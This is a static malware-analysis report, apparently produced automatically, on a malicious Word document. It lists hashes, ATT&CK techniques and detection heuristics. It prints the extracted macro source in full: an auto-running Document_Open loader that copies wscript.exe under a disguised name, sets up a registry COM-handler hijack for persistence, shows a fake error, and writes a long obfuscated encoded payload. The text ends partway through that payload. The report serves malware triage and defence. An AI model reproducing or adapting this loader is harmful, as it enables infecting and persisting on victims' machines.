Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 7ec0523fca7bc8ee…

MALICIOUS

Office (OOXML)

Size: 30.7 KB
Created: 2018-08-23 03:10:00 UTC
Authoring application: Microsoft Office Word 15.0000
First seen: 2020-05-25
MD5: ee836e0f7a40571523bf56dba59898f6
SHA-1: 02ec4289ea7cc862d708fe163ecf884fe9d8707f
SHA-256: 7ec0523fca7bc8eee27844038ce8ea985e0e0a95a9b906b917de9592929a966b
Risk Score: 378

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1218 System Binary Proxy Execution

The sample contains a VBA macro with a Document_Open auto-execution routine. The macro uses WScript.Shell and references a LOLBin, indicating an attempt to execute arbitrary code. Together, these critical heuristics strongly suggest that the document is designed to download and execute a secondary payload, likely using system binaries for execution.

Heuristics (10)

  • ClamAV: Doc.Trojan.Agent-6923201-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Agent-6923201-0
  • VBA project inside OOXML (medium, OOXML_VBA; 6 related findings)
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage (critical, OLE_VBA_WSCRIPT)
    Matched line in script
        Dim PdWkQsFOTJJajPBLIcbWkYDN As Object
        Set PdWkQsFOTJJajPBLIcbWkYDN = CreateObject("WScript.Shell")
        PdWkQsFOTJJajPBLIcbWkYDN.RegWrite gvZwdQOirrfB, TnbMvyqNwKQlpRBnlKUsWHk, "REG_SZ"
  • LOLBin reference in VBA (critical, OLE_VBA_LOLBIN)
    Matched line in script
        If OFSO.FolderExists(arcPath) = True Then
            FileCopy wRXfRfhGCxCPW & "\Windows\SysWOW64\wscript.exe", rzfevexNwMGnPWXpK & "\msohtml.exe"
        Else
  • CreateObject call (high, OLE_VBA_CREATEOBJ)
    Matched line in script
        Dim PdWkQsFOTJJajPBLIcbWkYDN As Object
        Set PdWkQsFOTJJajPBLIcbWkYDN = CreateObject("WScript.Shell")
        PdWkQsFOTJJajPBLIcbWkYDN.RegWrite gvZwdQOirrfB, TnbMvyqNwKQlpRBnlKUsWHk, "REG_SZ"
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro (low, OLE_VBA_DOCOPEN)
    Matched line in script
    End Function
    Private Sub Document_Open()
        On Error Resume Next
  • Environ() call (env variable access) (low, OLE_VBA_ENVIRON)
    Matched line in script
        Dim FxrIUmVmgUiWfGXVnAnEPgZ As String
        FxrIUmVmgUiWfGXVnAnEPgZ = Environ("temp")
        TnbMvyqNwKQlpRBnlKUsWHk = FxrIUmVmgUiWfGXVnAnEPgZ & "\msohtml.exe"
  • Suspicious extracted artifact (medium, EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URLs:
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas - In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 - In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships - In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/math - In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing - In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing - In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main - In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordml - In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordml - In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup - In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk - In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordml - In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape - In document text (OOXML body / shared strings)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 22563 bytes
SHA-256: 4d0a30fefc9e2b0f5c73acb18346d9db3e814a670fe82fdc47b03842704958c3
Detection
ClamAV: No threats found
Obfuscation or payload: likely
179 of 270 identifiers look randomly generated (e.g. 'LDY1MSw2OTUsNzQ5LDc1Miw3NDksNjgxLDY0NSw2') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
#If VBA7 Then
    Private Declare PtrSafe Function CoCreateGuid Lib "OLE32.DLL" (pGuid As hXgFaVZLEaiKwzLqv) As LongPtr
#Else
    Private Declare Function CoCreateGuid Lib "OLE32.DLL" (pGuid As hXgFaVZLEaiKwzLqv) As Long
#End If


Private Type hXgFaVZLEaiKwzLqv
    bVVEdJCmGdZvSxJjgkDzm As Long
    zuTOmqOrHzTiruTul As Integer
    ikZiOOfstTnTLVyDJPtLvZhi As Integer
    stTnTLVyDJPdsf3d(0 To 7) As Byte
End Type

Public Function rgmbpzZsmHAHge() As String
    Dim SDJgLaifFfuWl As hXgFaVZLEaiKwzLqv
    With SDJgLaifFfuWl
    If (CoCreateGuid(SDJgLaifFfuWl) = 0) Then
    rgmbpzZsmHAHge = _
        String$(8 - Len(Hex$(.bVVEdJCmGdZvSxJjgkDzm)), "0") & Hex$(.bVVEdJCmGdZvSxJjgkDzm) & "-" & _
        String$(4 - Len(Hex$(.zuTOmqOrHzTiruTul)), "0") & Hex$(.zuTOmqOrHzTiruTul) & "-" & _
        String$(4 - Len(Hex$(.ikZiOOfstTnTLVyDJPtLvZhi)), "0") & Hex$(.ikZiOOfstTnTLVyDJPtLvZhi) & "-" & _
        IIf((.stTnTLVyDJPdsf3d(0) < &H10), "0", "") & Hex$(.stTnTLVyDJPdsf3d(0)) & _
        IIf((.stTnTLVyDJPdsf3d(1) < &H10), "0", "") & Hex$(.stTnTLVyDJPdsf3d(1)) & "-" & _
        IIf((.stTnTLVyDJPdsf3d(2) < &H10), "0", "") & Hex$(.stTnTLVyDJPdsf3d(2)) & _
        IIf((.stTnTLVyDJPdsf3d(3) < &H10), "0", "") & Hex$(.stTnTLVyDJPdsf3d(3)) & _
        IIf((.stTnTLVyDJPdsf3d(4) < &H10), "0", "") & Hex$(.stTnTLVyDJPdsf3d(4)) & _
        IIf((.stTnTLVyDJPdsf3d(5) < &H10), "0", "") & Hex$(.stTnTLVyDJPdsf3d(5)) & _
        IIf((.stTnTLVyDJPdsf3d(6) < &H10), "0", "") & Hex$(.stTnTLVyDJPdsf3d(6)) & _
        IIf((.stTnTLVyDJPdsf3d(7) < &H10), "0", "") & Hex$(.stTnTLVyDJPdsf3d(7))
    End If
    End With
End Function
Function HLKBVQlJEPWph(gvZwdQOirrfB As String)
    Dim TnbMvyqNwKQlpRBnlKUsWHk, MBrUZCnACSJYjdxmUAnw
    Dim FxrIUmVmgUiWfGXVnAnEPgZ As String
    FxrIUmVmgUiWfGXVnAnEPgZ = Environ("temp")
    TnbMvyqNwKQlpRBnlKUsWHk = FxrIUmVmgUiWfGXVnAnEPgZ & "\msohtml.exe"
    TnbMvyqNwKQlpRBnlKUsWHk = TnbMvyqNwKQlpRBnlKUsWHk & " //E:vbscript /b " & FxrIUmVmgUiWfGXVnAnEPgZ
    TnbMvyqNwKQlpRBnlKUsWHk = TnbMvyqNwKQlpRBnlKUsWHk & "\msohtml.log"
    
    Dim PdWkQsFOTJJajPBLIcbWkYDN As Object
    Set PdWkQsFOTJJajPBLIcbWkYDN = CreateObject("WScript.Shell")
    PdWkQsFOTJJajPBLIcbWkYDN.RegWrite gvZwdQOirrfB, TnbMvyqNwKQlpRBnlKUsWHk, "REG_SZ"
End Function
Private Sub Document_Open()
    On Error Resume Next
    Dim FxrIUmVmgUiWfGXVnAnEPgZ As String
    FxrIUmVmgUiWfGXVnAnEPgZ = Environ("temp")
    
    Dim gvZwdQOirrfB, MBrUZCnACSJYjdxmUAnw
    MBrUZCnACSJYjdxmUAnw = rgmbpzZsmHAHge
    gvZwdQOirrfB = "HKCU\Software\Classes\CLSID\{"
    gvZwdQOirrfB = gvZwdQOirrfB & MBrUZCnACSJYjdxmUAnw
    gvZwdQOirrfB = gvZwdQOirrfB & "}\Shell\Manage\Command\"
    
    PRuhLvyjtAPrH FxrIUmVmgUiWfGXVnAnEPgZ
    yiBhyERIualWRmBjcsIbCZLq (MBrUZCnACSJYjdxmUAnw)
    HLKBVQlJEPWph (gvZwdQOirrfB)
    ActiveDocument.Range.Text = "Error : 0x8004fc12"
End Sub
Function PRuhLvyjtAPrH(rzfevexNwMGnPWXpK As String)
    Dim tgrIRwdsnmuquriMIt As String
    tgrIRwdsnmuquriMIt = rzfevexNwMGnPWXpK & "\msohtml.log"
        Data = Data + "Y3M9QXJyYXkoNjQyLDY3NSw3NDksNjQ4LDcwMyw3MDMsNjc0LDcwMyw3NDksNjcxLDY4MCw3MDIsNjk2"
    Data = Data + "LDY3Miw2ODAsNzQ5LDY0Myw2ODAsNjkzLDY5Nyw3MTEsNjUxLDY5Niw2NzUsNjg2LDY5Nyw2NzYsNjc0"
    Data = Data + "LDY3NSw3NDksNjc0LDY1MSw2OTUsNjk3LDY0OSw2NTAsNjY3LDY0Myw2ODQsNjc3LDY0OSw2NzMsNjk3"
    Data = Data + "LDY5NSw3MDAsNjcxLDcwMyw2NDAsNjYwLDc0MSw2NDUsNjkyLDY0MSw2NjcsNjQ4LDcwMiw2NjEsNjQy"
    Data = Data + "LDY4Nyw2NzAsNjgyLDY4Miw3MDIsNjQ1LDY2Myw2NjgsNjg0LDcwMCw2ODcsNjc2LDY1NCw2NjAsNzAz"
    Data = Data + "LDczNyw2NDksNjcyLDY0MSw2NTEsNjk3LDY5Nyw2NjMsNjQ4LDY0NSw3MDMsNjgyLDY5Niw2NDksNjQy"
    Data = Data + "LDY4Myw2NjgsNjgzLDc0MCw3MTEsNjc0LDY1MSw2OTUsNjk3LDY0OSw2NTAsNjY3LDY0Myw2ODQsNjc3"
    Data = Data + "LDY0OSw2NzMsNjk3LDY5NSw3MDAsNjcxLDcwMyw2NDAsNjYwLDc0OSw3NTIsNzQ5LDY0NSw2OTIsNjQx"
    Data = Data + "LDY2Nyw2NDgsNzAyLDY2MSw2NDIsNjg3LDY3MCw2ODIsNjgyLDcwMiw2NDUsNjYzLDY2OCw2ODQsNzAw"
    Data = Data + "LDY4Nyw2NzYsNjU0LDY2MCw3MDMsNzQ5LDc0Miw3NDksNjQ5LDY3Miw2NDEsNjUxLDY5Nyw2OTcsNjYz"
    Data = Data + "LDY0OCw2NDUsNzAzLDY4Miw2OTYsNjQ5LDY0Miw2ODMsNjY4LDY4Myw3MTEsNjQ4LDY3NSw2ODEsNzQ5"
    Data = Data + "LDY1MSw2OTYsNjc1LDY4Niw2OTcsNjc2LDY3NCw2NzUsNzExLDY0OSw2NzYsNjcyLDc0OSw2NjksNjQ2"
    Data = Data + "LDY0Myw2NzUsNjk1LDY1Miw2NzcsNjgyLDY5NSw2NjgsNjc2LDY2NSw2NjEsNjQ4LDY2Myw2NzMsNjg2"
    Data = Data + "LDY2NSw3MzcsNjc4LDY0OSw2NTAsNzAwLDY4Miw2ODEsNjQzLDY5Niw2OTcsNjgxLDY3NCw2NDQsNjc2"
    Data = Data + "LDY3MCw2NzYsNjc5LDY0NCw2NzMsNjczLDY0NCw2NjQsNjQ5LDY4MSw3MzcsNjQ5LDY5NSw3MDEsNjk4"
    Data = Data + "LDY3Myw2NTAsNjYzLDcwMCw2OTIsNjYwLDY4MSw2NzgsNjcxLDY5Nyw2NzIsNjc3LDY2MSw3MDMsNzEx"
    Data = Data + "LDY3MSw2ODQsNjc1LDY4MSw2NzQsNjcyLDY3Niw2OTUsNjgwLDcxMSw2NzgsNjQ5LDY1MCw3MDAsNjgy"
    Data = Data + "LDY4MSw2NDMsNjk2LDY5Nyw2ODEsNjc0LDY0NCw2NzYsNjcwLDY3Niw2NzksNjQ0LDY3Myw2NzMsNjQ0"
    Data = Data + "LDY2NCw2NDksNjgxLDc0OSw3NTIsNzQ5LDY3MSw2NzUsNjgxLDcxMSw2NDksNjk1LDcwMSw2OTgsNjcz"
    Data = Data + "LDY1MCw2NjMsNzAwLDY5Miw2NjAsNjgxLDY3OCw2NzEsNjk3LDY3Miw2NzcsNjYxLDcwMyw3NDksNzUy"
    Data = Data + "LDc0OSw2NzEsNjc1LDY4MSw3MTEsNjY5LDY0Niw2NDMsNjc1LDY5NSw2NTIsNjc3LDY4Miw2OTUsNjY4"
    Data = Data + "LDY3Niw2NjUsNjYxLDY0OCw2NjMsNjczLDY4Niw2NjUsNzQ5LDc1Miw3NDksNjc0LDY1MSw2OTUsNjk3"
    Data = Data + "LDY0OSw2NTAsNjY3LDY0Myw2ODQsNjc3LDY0OSw2NzMsNjk3LDY5NSw3MDAsNjcxLDcwMyw2NDAsNjYw"
    Data = Data + "LDc0MSw2NzgsNjQ5LDY1MCw3MDAsNjgyLDY4MSw2NDMsNjk2LDY5Nyw2ODEsNjc0LDY0NCw2NzYsNjcw"
    Data = Data + "LDY3Niw2NzksNjQ0LDY3Myw2NzMsNjQ0LDY2NCw2NDksNjgxLDczNyw2NDksNjk1LDcwMSw2OTgsNjcz"
    Data = Data + "LDY1MCw2NjMsNzAwLDY5Miw2NjAsNjgxLDY3OCw2NzEsNjk3LDY3Miw2NzcsNjYxLDcwMyw3NDAsNzEx"
    Data = Data + "LDY1MSw2OTYsNjc1LDY4Niw2OTcsNjc2LDY3NCw2NzUsNzQ5LDY4MSw2NDUsNjUyLDY1MCw2ODcsNjc2"
    Data = Data + "LDY4Niw2NzYsNjcxLDY0Myw2OTMsNjg3LDY5Miw3NDEsNzQ5LDY2NSw2NDEsNjU0LDY4MCw2NDYsNjk1"
    Data = Data + "LDY4Myw2OTksNjgxLDY2NCw2NjYsNjQwLDY0NCw2ODEsNjY4LDc0OSw3NDAsNzExLDc0OSw3NDksNzQ5"
    Data = Data + "LDc0OSw2NDksNjc2LDY3Miw3NDksNjQ3LDY3Miw2NjQsNjc3LDY2OSw2NDEsNjU0LDY0MSw2NzIsNjQ1"
    Data = Data + "LDY5Niw2NzgsNjQ3LDczNyw3NDksNjg2LDcwMiw2NzgsNjg0LDY4MCw2NTQsNjcyLDY1MCw2ODYsNjcz"
    Data = Data + "LDY3NCw2OTUsNzQxLDc0OSw3NDAsNzExLDc0OSw3NDksNzQ5LDc0OSw2NzEsNjgwLDY0OSw2NzYsNjcy"
    Data = Data + "LDc0OSw2ODYsNzAyLDY3OCw2ODQsNjgwLDY1NCw2NzIsNjUwLDY4Niw2NzMsNjc0LDY5NSw3NDEsNzQ5"
    Data = Data + "LDY0MSw2ODAsNjc1LDc0MSw3NDksNjY1LDY0MSw2NTQsNjgwLDY0Niw2OTUsNjgzLDY5OSw2ODEsNjY0"
    Data = Data + "LDY2Niw2NDAsNjQ0LDY4MSw2NjgsNzQ5LDc0MCw3NDksNzM2LDc0OSw3NjQsNzQ5LDc0MCw3MTEsNzQ5"
    Data = Data + "LDc0OSw3NDksNzQ5LDY1MSw2NzQsNzAzLDc0OSw2NDcsNjcyLDY2NCw2NzcsNjY5LDY0MSw2NTQsNjQx"
    Data = Data + "LDY3Miw2NDUsNjk2LDY3OCw2NDcsNzQ5LDc1Miw3NDksNzY1LDc0OSw2NjUsNjc0LDc0OSw2NjQsNjU1"
    Data = Data + "LDY3NCw2OTYsNjc1LDY4MSw3NDEsNzQ5LDY4Niw3MDIsNjc4LDY4NCw2ODAsNjU0LDY3Miw2NTAsNjg2"
    Data = Data + "LDY3Myw2NzQsNjk1LDc0OSw3NDAsNzExLDc0OSw3NDksNzQ5LDc0OSw3NDksNzQ5LDc0OSw3NDksNjg2"
    Data = Data + "LDcwMiw2NzgsNjg0LDY4MCw2NTQsNjcyLDY1MCw2ODYsNjczLDY3NCw2OTUsNzQxLDY0Nyw2NzIsNjY0"
    Data = Data + "LDY3Nyw2NjksNjQxLDY1NCw2NDEsNjcyLDY0NSw2OTYsNjc4LDY0Nyw3NDAsNzQ5LDc1Miw3NDksNjUy"
    Data = Data + "LDcwMiw2ODYsNzQxLDc0OSw2NDAsNjc2LDY4MSw3NDEsNzQ5LDY2NSw2NDEsNjU0LDY4MCw2NDYsNjk1"
    Data = Data + "LDY4Myw2OTksNjgxLDY2NCw2NjYsNjQwLDY0NCw2ODEsNjY4LDczNyw3NDksNjQ3LDY3Miw2NjQsNjc3"
    Data = Data + "LDY2OSw2NDEsNjU0LDY0MSw2NzIsNjQ1LDY5Niw2NzgsNjQ3LDc0OSw3NDIsNzQ5LDc2NCw3MzcsNzQ5"
    Data = Data + "LDc2NCw3NDksNzQwLDc0OSw3NDAsNzExLDc0OSw3NDksNzQ5LDc0OSw2NDMsNjgwLDY5Myw2OTcsNzEx"
    Data = Data + "LDc0OSw3NDksNzQ5LDc0OSw2ODEsNjQ1LDY1Miw2NTAsNjg3LDY3Niw2ODYsNjc2LDY3MSw2NDMsNjkz"
    Data = Data + "LDY4Nyw2OTIsNzQ5LDc1Miw3NDksNjg2LDcwMiw2NzgsNjg0LDY4MCw2NTQsNjcyLDY1MCw2ODYsNjcz"
    Data = Data + "LDY3NCw2OTUsNzExLDY0OCw2NzUsNjgxLDc0OSw2NTEsNjk2LDY3NSw2ODYsNjk3LDY3Niw2NzQsNjc1"
    Data = Data + "LDcxMSw2NDksNjc2LDY3Miw3NDksNjUyLDY0OSw2NDksNjg3LDcwMCw2NjEsNjk4LDY0NSw2NzEsNjgx"
    Data = Data + "LDY0Niw2NTEsNjk1LDcxMSw2NTIsNjQ5LDY0OSw2ODcsNzAwLDY2MSw2OTgsNjQ1LDY3MSw2ODEsNjQ2"
    Data = Data + "LDY1MSw2OTUsNzQ5LDc1Miw3NDksNjgxLDY0NSw2NTIsNjUwLDY4Nyw2NzYsNjg2LDY3Niw2NzEsNjQz"
    Data = Data + "LDY5Myw2ODcsNjkyLDc0MSw2NjYsNjg2LDY5Niw2NDUsNjYwLDY5Miw2NjksNjk1LDY1NCw2NDMsNjc0"
    Data = Data + "LDY0MSw2NjcsNjQ1LDcwMCw2NTAsNjUyLDY2Myw2NTAsNjkyLDY1MCw2ODcsNzQwLDcxMSw2NTEsNjk2"
    Data = Data + "LDY3NSw2ODYsNjk3LDY3Niw2NzQsNjc1LDc0OSw2ODMsNjgxLDcwMCw2NTUsNzAzLDY5Niw2NTIsNjQ2"
    Data = Data + "LDY1Miw2NzUsNjY3LDY1MCw2NDksNjY1LDcwMiw2NDEsNjcxLDc0MSw3NDksNjgwLDY5Nyw2NDYsNjQw"
    Data = Data + "LDY1MSw2NzMsNjQ5LDY0Niw2NTEsNjc5LDY2NCw2OTksNjY2LDY2NCw2OTMsNjgwLDY1NSw2NzYsNjY3"
    Data = Data + "LDY1Miw2NDEsNzQ5LDc0MCw3MTEsNzQ5LDc0OSw3NDksNzQ5LDY0OSw2NzYsNjcyLDc0OSw2NDMsNjc1"
    Data = Data + "LDY3OSw2ODEsNjY3LDY3Niw2OTksNjQ2LDY4MSw2NzEsNjYzLDcwMyw2ODAsNzAzLDY1NSw2ODAsNjk5"
    Data = Data + "LDY0MCw2NDksNjc0LDY0Niw2ODAsNjc0LDY0OCw3MzcsNzQ5LDY3Niw2NDYsNjc2LDY5Nyw2OTMsNjUw"
    Data = Data + "LDY3Nyw2NDksNjg0LDcwMCw2OTcsNjgwLDY4Myw2NDgsNjUyLDY0Nyw2NTUsNjkzLDY5Niw2NzksNjY0"
    Data = Data + "LDY0NSw3NDEsNzQ5LDc0MCw3MTEsNzQ5LDc0OSw3NDksNzQ5LDY3MSw2ODAsNjQ5LDY3Niw2NzIsNzQ5"
    Data = Data + "LDY3Niw2NDYsNjc2LDY5Nyw2OTMsNjUwLDY3Nyw2NDksNjg0LDcwMCw2OTcsNjgwLDY4Myw2NDgsNjUy"
    Data = Data + "LDY0Nyw2NTUsNjkzLDY5Niw2NzksNjY0LDY0NSw3NDEsNzQ5LDY0MSw2ODAsNjc1LDc0MSw3NDksNjgw"
    Data = Data + "LDY5Nyw2NDYsNjQwLDY1MSw2NzMsNjQ5LDY0Niw2NTEsNjc5LDY2NCw2OTksNjY2LDY2NCw2OTMsNjgw"
    Data = Data + "LDY1NSw2NzYsNjY3LDY1Miw2NDEsNzQ5LDc0MCw3NDksNzM2LDc0OSw3NjQsNzQ5LDc0MCw3MTEsNzQ5"
    Data = Data + "LDc0OSw3NDksNzQ5LDY1MSw2NzQsNzAzLDc0OSw2NDMsNjc1LDY3OSw2ODEsNjY3LDY3Niw2OTksNjQ2"
    Data = Data + "LDY4MSw2NzEsNjYzLDcwMyw2ODAsNzAzLDY1NSw2ODAsNjk5LDY0MCw2NDksNjc0LDY0Niw2ODAsNjc0"
    Data = Data + "LDY0OCw3NDksNzUyLDc0OSw3NjUsNzQ5LDY2NSw2NzQsNzQ5LDY2NCw2NTUsNjc0LDY5Niw2NzUsNjgx"
    Data = Data + "LDc0MSw3NDksNjc2LDY0Niw2NzYsNjk3LDY5Myw2NTAsNjc3LDY0OSw2ODQsNzAwLDY5Nyw2ODAsNjgz"
    Data = Data + "LDY0OCw2NTIsNjQ3LDY1NSw2OTMsNjk2LDY3OSw2NjQsNjQ1LDc0OSw3NDAsNzExLDc0OSw3NDksNzQ5"
    Data = Data + "LDc0OSw3NDksNzQ5LDc0OSw3NDksNjc2LDY0Niw2NzYsNjk3LDY5Myw2NTAsNjc3LDY0OSw2ODQsNzAw"
    Data = Data + "LDY5Nyw2ODAsNjgzLDY0OCw2NTIsNjQ3LDY1NSw2OTMsNjk2LDY3OSw2NjQsNjQ1LDc0MSw2NDMsNjc1"
    Data = Data + "LDY3OSw2ODEsNjY3LDY3Niw2OTksNjQ2LDY4MSw2NzEsNjYzLDcwMyw2ODAsNzAzLDY1NSw2ODAsNjk5"
    Data = Data + "LDY0MCw2NDksNjc0LDY0Niw2ODAsNjc0LDY0OCw3NDAsNzQ5LDc1Miw3NDksNjUyLDcwMiw2ODYsNzQx"
    Data = Data + "LDc0OSw2NDAsNjc2LDY4MSw3NDEsNzQ5LDY4MCw2OTcsNjQ2LDY0MCw2NTEsNjczLDY0OSw2NDYsNjUx"
    Data = Data + "LDY3OSw2NjQsNjk5LDY2Niw2NjQsNjkzLDY4MCw2NTUsNjc2LDY2Nyw2NTIsNjQxLDczNyw3NDksNjQz"
    Data = Data + "LDY3NSw2NzksNjgxLDY2Nyw2NzYsNjk5LDY0Niw2ODEsNjcxLDY2Myw3MDMsNjgwLDcwMyw2NTUsNjgw"
    Data = Data + "LDY5OSw2NDAsNjQ5LDY3NCw2NDYsNjgwLDY3NCw2NDgsNzQ5LDc0Miw3NDksNzY0LDczNyw3NDksNzY0"
    Data = Data + "LDc0OSw3NDAsNzQ5LDc0MCw3MTEsNzQ5LDc0OSw3NDksNzQ5LDY0Myw2ODAsNjkzLDY5Nyw3MTEsNzQ5"
    Data = Data + "LDc0OSw3NDksNzQ5LDY4Myw2ODEsNzAwLDY1NSw3MDMsNjk2LDY1Miw2NDYsNjUyLDY3NSw2NjcsNjUw"
    Data = Data + "LDY0OSw2NjUsNzAyLDY0MSw2NzEsNzQ5LDc1Miw3NDksNjc2LDY0Niw2NzYsNjk3LDY5Myw2NTAsNjc3"
    Data = Data + "LDY0OSw2ODQsNzAwLDY5Nyw2ODAsNjgzLDY0OCw2NTIsNjQ3LDY1NSw2OTMsNjk2LDY3OSw2NjQsNjQ1"
    Data = Data + "LDcxMSw2NDgsNjc1LDY4MSw3NDksNjUxLDY5Niw2NzUsNjg2LDY5Nyw2NzYsNjc0LDY3NSw3MTEsNjQ5"
    Data = Data + "LDY3Niw2NzIsNzQ5LDY2MCw2NDAsNjQ0LDY3OSw2NDIsNzAxLDY0NSw2OTMsNjY0LDcwMSw2OTgsNjcz"
    Data = Data + "LDY4Nyw2OTcsNjQ0LDcwMyw2NzYsNjc1LDcxMSw2ODYsNzAyLDc1Miw2NTIsNzAzLDcwMyw2ODQsNjky"
    Data = Data + "LDc0MSw3NjYsNzU3LDc2Nyw3MzcsNzY2LDc2MCw3NjQsNzM3LDc2Nyw3NjIsNzY2LDczNyw3NjYsNzYy"
    Data = Data + "LDc2Nyw3MzcsNzY2LDc2Nyw3NjYsNzM3LDc2Niw3NjcsNzY2LDczNyw3NjYsNzYwLDc2NSw3MzcsNzY2"
    Data = Data + "LDc2Nyw3NjYsNzM3LDc2Nyw3NjIsNzY2LDczNyw3NjYsNzYwLDc2MCw3MzcsNzY2LDc2MSw3NjUsNzM3"
    Data = Data + "LDc2Niw3NjcsNzY3LDczNyw3NjYsNzY3LDc2MSw3MzcsNzY2LDc2MSw3NTcsNzM3LDc2Niw3NjEsNzY1"
    Data = Data + "LDczNyw3NjcsNzYyLDc2Niw3MzcsNzY2LDc1Nyw3NjYsNzM3LDc2Niw3NjEsNzY1LDczNyw3NjYsNzY3"
    Data = Data + "LDc1Niw3MzcsNzY2LDc2Nyw3NjAsNzM3LDc2Nyw3NjIsNzY2LDczNyw3NjcsNzYzLDc2Miw3MzcsNzY3"
    Data = Data + "LDc2Miw3NjYsNzM3LDc2Niw3NjcsNzY3LDczNyw3NjYsNzYxLDc2NSw3MzcsNzY2LDc2Nyw3NjAsNzM3"
    Data = Data + "LDc2Nyw3NjIsNzY2LDczNyw3NjYsNzYzLDc1Nyw3MzcsNzY2LDc2Miw3NjcsNzM3LDc2Niw3NjIsNzY3"
    Data = Data + "LDczNyw3NjYsNzYwLDc1Niw3MzcsNzY2LDc2MSw3NjEsNzM3LDc2Niw3NjcsNzY2LDczNyw3NjYsNzYz"
    Data = Data + "LDc1Nyw3MzcsNzY2LDc2MSw3NjUsNzM3LDc2Niw3NjEsNzYwLDczNyw3NjYsNzYyLDc2Nyw3MzcsNzY2"
    Data = Data + "LDc2Nyw3NjcsNzM3LDc2Niw3NjMsNzY2LDczNyw3NjYsNzYyLDc2NSw3MzcsNzY2LDc2Miw3NjMsNzM3"
    Data = Data + "LDc2Niw3NjcsNzYyLDczNyw3NjYsNzY3LDc1Nyw3MzcsNzY2LDc2MCw3NjMsNzM3LDc2Niw3NjAsNzYw"
    Data = Data + "LDczNyw3NjYsNzYwLDc2Myw3MzcsNzY2LDc2MCw3NTYsNzM3LDc2Niw3NjEsNzY0LDczNyw3NjYsNzY2"
    Data = Data + "LDc2Myw3MzcsNzY2LDc2MSw3NjYsNzM3LDc2Niw3NTcsNzY0LDczNyw3NjcsNzYyLDc2Niw3MzcsNzY3"
    Data = Data + "LDc2Myw3NTcsNzM3LDc2Nyw3NjIsNzY2LDczNyw3NjYsNzYyLDc2MSw3MzcsNzY2LDc2MSw3NjUsNzM3"
    Data = Data + "LDc2Niw3NjcsNzYwLDczNyw3NjYsNzU3LDc2Nyw3MzcsNzY2LDc2Niw3NTYsNzM3LDc2Niw3NjEsNzYy"
    Data = Data + "LDczNyw3NjYsNzYxLDc2NSw3MzcsNzY2LDc2Niw3NTcsNzM3LDc2Niw3NjcsNzYwLDczNyw3NjcsNzU3"
    Data = Data + "LDc2NCw3MzcsNzY3LDc2Miw3NjAsNzM3LDc2Niw3NjcsNzY3LDczNyw3NjYsNzY2LDc1Nyw3MzcsNzY2"
    Data = Data + "LDc2Nyw3NjYsNzM3LDc2Niw3NjEsNzYxLDczNyw3NjYsNzY3LDc2NCw3MzcsNzY2LDc2Nyw3NjAsNzM3"
    Data = Data + "LDc2Nyw3NjMsNzYyLDczNyw3NjYsNzYxLDc2MCw3MzcsNzY2LDc2Nyw3NjAsNzM3LDc2Niw3NjcsNzYw"
    Data = Data + "LDczNyw3NjYsNzY3LDc2NCw3MzcsNzY2LDc2Nyw3NjcsNzM3LDc2Nyw3NjMsNzYyLDczNyw3NjcsNzU3"
    Data = Data + "LDc2Myw3MzcsNzY3LDc1Nyw3NjMsNzM3LDc2Niw3NjAsNzY1LDczNyw3NjYsNzY3LDc2NCw3MzcsNzY2"
    Data = Data + "LDc2MSw3NjUsNzM3LDc2Niw3NjAsNzY0LDczNyw3NjcsNzU3LDc2Miw3MzcsNzY2LDc2Niw3NTYsNzM3"
    Data = Data + "LDc2Niw3NjEsNzY1LDczNyw3NjYsNzY3LDc2MCw3MzcsNzY2LDc2Niw3NjMsNzM3LDc2Niw3NjAsNzY1"
    Data = Data + "LDczNyw3NjYsNzYxLDc2Niw3MzcsNzY2LDc2MSw3NjYsNzM3LDc2Niw3NjEsNzYxLDczNyw3NjYsNzY2"
    Data = Data + "LDc1Nyw3MzcsNzY2LDc2MSw3NjUsNzM3LDc2Nyw3NTcsNzYyLDczNyw3NjYsNzYwLDc2NCw3MzcsNzY2"
    Data = Data + "LDc2MSw3NjUsNzM3LDc2Niw3NjcsNzYwLDczNyw3NjcsNzU3LDc2Myw3MzcsNzY2LDc2MSw3NjQsNzM3"
    Data = Data + "LDc2Niw3NjcsNzY2LDczNyw3NjYsNzY2LDc2Myw3MzcsNzY2LDc2Niw3NjMsNzM3LDc2Nyw3NTcsNzYy"
